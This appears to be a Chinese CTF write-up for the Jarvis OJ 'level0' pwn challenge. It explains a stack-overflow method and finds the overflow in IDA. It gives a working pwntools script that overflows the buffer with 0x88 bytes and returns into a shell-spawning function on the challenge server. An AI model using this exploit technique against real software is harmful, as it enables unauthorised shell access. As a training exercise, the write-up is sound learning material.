攻防世界和jarvis oj level0

攻防世界和jarvis oj level0个人做题小结

注意:攻防世界和这道题一模一样!!!!!!!

刚开始接触还不太熟悉详情请点下面链接
https://nocbtm.github.io/2018/09/21/oj-level0%E5%92%8Clevel1%E6%80%BB%E7%BB%93/

  • 明白做栈溢出的套路
    (1)找到栈溢出地址(就是搞事情的地址),基本上都是buf的地址,这个地址需要用pwntools中的p32或p64进行转换,(若程序是32位的就用p32)才能用pwntools中的sendline发送到远程连接
    (2)构建shellcode,用一句话就行shellcode = asm(shellcraft.sh())
    (3)构建payload,payload的基本构建:payload=shellcode+’a’*一个长度+p32(buf_addr),次序一定不能乱
    (4)最后就可以发送payload,进行交互,得到shell的控制权,然后ls ,cat flag
  • 做题过程
    (1)首先放进ubuntu中查看他的权限和1位数在这里插入图片描述
    (2)然后用IDA打开 使用反编译 找到溢出点在这里插入图片描述
    在这里插入图片描述
    vulnerable_function容易被攻击的函数这个地方就是他的溢出点
    然后在找到system的地址
    在这里插入图片描述
    (3)下面是脚本在这里插入代码片
 from pwn import *
 s_addr=0x0000000000400596
 p=remote("pwn2.jarvisoj.com",9881)#用来建立一个远程连接,url或者ip作为地址
                                  然后指明端口,这里也可以仅仅使用本地文件,调试时方便
 p.recvline()
 p.sendline("A"*0x80+'A'*8+p64(s_addr))  
 p.interactive() 

(4)最后是运行脚本
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值